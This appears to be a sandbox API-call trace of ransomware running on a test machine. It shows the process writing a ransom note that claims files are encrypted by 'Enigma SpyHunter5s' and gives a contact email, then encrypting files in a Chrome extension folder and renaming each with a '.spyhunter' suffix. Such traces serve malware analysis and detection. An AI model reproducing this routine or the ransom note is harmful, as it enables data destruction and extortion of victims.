[0158.828] GetProcessHeap () returned 0x2c0000 [0158.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0158.828] GetProcessHeap () returned 0x2c0000 [0158.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21180 | out: hHeap=0x2c0000) returned 1 [0158.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.831] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0158.832] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec88, lpOverlapped=0x0 | out: lpBuffer=0x248eb5f*, lpNumberOfBytesWritten=0x248ec88*=0x127, lpOverlapped=0x0) returned 1 [0158.844] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0158.844] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec88*=0x2ac, lpOverlapped=0x0) returned 1 [0158.844] CloseHandle (hObject=0xa0) returned 1 [0158.844] GetProcessHeap () returned 0x2c0000 [0158.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009860 | out: hHeap=0x2c0000) returned 1 [0158.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec28 | out: pbBuffer=0x248ec28) returned 1 [0158.845] GetProcessHeap () returned 0x2c0000 [0158.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0158.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec20*=0x30) returned 1 [0158.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html") returned 160 [0158.846] StrStrW (lpFirst="setup.html", lpSrch=".txt") returned 0x0 [0158.846] GetProcessHeap () returned 0x2c0000 [0158.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.846] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebe4*=0x3b, lpOverlapped=0x0) returned 1 [0158.847] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.847] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x248ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebe4*=0x3b, lpOverlapped=0x0) returned 1 [0158.847] GetProcessHeap () returned 0x2c0000 [0158.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.847] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.847] WriteFile (in: hFile=0xa0, lpBuffer=0x248ec24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebe4, lpOverlapped=0x0 | out: lpBuffer=0x248ec24*, lpNumberOfBytesWritten=0x248ebe4*=0x4, lpOverlapped=0x0) returned 1 [0158.847] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebe4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebe4*=0x30, lpOverlapped=0x0) returned 1 [0158.848] CloseHandle (hObject=0xa0) returned 1 [0158.848] GetProcessHeap () returned 0x2c0000 [0158.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.848] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.spyhunter") returned 170 [0158.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.spyhunter")) returned 1 [0158.849] GetProcessHeap () returned 0x2c0000 [0158.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.849] GetProcessHeap () returned 0x2c0000 [0158.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0158.849] GetProcessHeap () returned 0x2c0000 [0158.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20fe8 | out: hHeap=0x2c0000) returned 1 [0158.849] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec20 | out: pbBuffer=0x248ec20) returned 1 [0158.849] GetProcessHeap () returned 0x2c0000 [0158.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0158.850] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec18*=0x30) returned 1 [0158.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html") returned 161 [0158.850] StrStrW (lpFirst="offers.html", lpSrch=".txt") returned 0x0 [0158.850] GetProcessHeap () returned 0x2c0000 [0158.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.851] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebdc*=0x3b, lpOverlapped=0x0) returned 1 [0158.851] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.851] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebdc*=0x3b, lpOverlapped=0x0) returned 1 [0158.852] GetProcessHeap () returned 0x2c0000 [0158.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.852] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.852] WriteFile (in: hFile=0xa0, lpBuffer=0x248ec1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x248ec1c*, lpNumberOfBytesWritten=0x248ebdc*=0x4, lpOverlapped=0x0) returned 1 [0158.852] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebdc*=0x30, lpOverlapped=0x0) returned 1 [0158.853] CloseHandle (hObject=0xa0) returned 1 [0158.853] GetProcessHeap () returned 0x2c0000 [0158.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.853] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.spyhunter") returned 171 [0158.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.spyhunter")) returned 1 [0158.854] GetProcessHeap () returned 0x2c0000 [0158.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.854] GetProcessHeap () returned 0x2c0000 [0158.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0158.854] GetProcessHeap () returned 0x2c0000 [0158.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20e50 | out: hHeap=0x2c0000) returned 1 [0158.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec20 | out: pbBuffer=0x248ec20) returned 1 [0158.854] GetProcessHeap () returned 0x2c0000 [0158.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0158.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec18*=0x30) returned 1 [0158.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0158.864] StrStrW (lpFirst="index.html", lpSrch=".txt") returned 0x0 [0158.864] GetProcessHeap () returned 0x2c0000 [0158.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.865] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebdc*=0x828, lpOverlapped=0x0) returned 1 [0158.867] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff7d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.867] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebdc*=0x828, lpOverlapped=0x0) returned 1 [0158.867] GetProcessHeap () returned 0x2c0000 [0158.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.867] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.867] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x248ec1c*, lpNumberOfBytesWritten=0x248ebdc*=0x4, lpOverlapped=0x0) returned 1 [0158.868] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebdc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebdc*=0x30, lpOverlapped=0x0) returned 1 [0158.868] CloseHandle (hObject=0x9c) returned 1 [0158.868] GetProcessHeap () returned 0x2c0000 [0158.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.868] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.spyhunter") returned 170 [0158.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.spyhunter")) returned 1 [0158.869] GetProcessHeap () returned 0x2c0000 [0158.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.869] GetProcessHeap () returned 0x2c0000 [0158.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0158.869] GetProcessHeap () returned 0x2c0000 [0158.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20cb8 | out: hHeap=0x2c0000) returned 1 [0158.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec18 | out: pbBuffer=0x248ec18) returned 1 [0158.869] GetProcessHeap () returned 0x2c0000 [0158.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0158.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec10*=0x30) returned 1 [0158.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.870] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0158.870] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".txt") returned 0x0 [0158.870] GetProcessHeap () returned 0x2c0000 [0158.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.870] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebd4*=0x1bef, lpOverlapped=0x0) returned 1 [0158.957] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffe411, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.957] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1bef, lpNumberOfBytesWritten=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebd4*=0x1bef, lpOverlapped=0x0) returned 1 [0158.958] GetProcessHeap () returned 0x2c0000 [0158.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.958] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.958] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x248ec14*, lpNumberOfBytesWritten=0x248ebd4*=0x4, lpOverlapped=0x0) returned 1 [0158.958] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebd4*=0x30, lpOverlapped=0x0) returned 1 [0158.958] CloseHandle (hObject=0x9c) returned 1 [0158.958] GetProcessHeap () returned 0x2c0000 [0158.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.958] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.spyhunter") returned 184 [0158.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.spyhunter")) returned 1 [0158.959] GetProcessHeap () returned 0x2c0000 [0158.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.959] GetProcessHeap () returned 0x2c0000 [0158.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0158.959] GetProcessHeap () returned 0x2c0000 [0158.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30096b8 | out: hHeap=0x2c0000) returned 1 [0158.960] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec18 | out: pbBuffer=0x248ec18) returned 1 [0158.960] GetProcessHeap () returned 0x2c0000 [0158.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0158.960] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec10*=0x30) returned 1 [0158.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0158.961] StrStrW (lpFirst="cast_route_details.js", lpSrch=".txt") returned 0x0 [0158.961] GetProcessHeap () returned 0x2c0000 [0158.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.962] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebd4*=0x2800, lpOverlapped=0x0) returned 1 [0159.003] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.003] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebd4*=0x2800, lpOverlapped=0x0) returned 1 [0159.004] GetProcessHeap () returned 0x2c0000 [0159.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.004] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.004] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebd4, 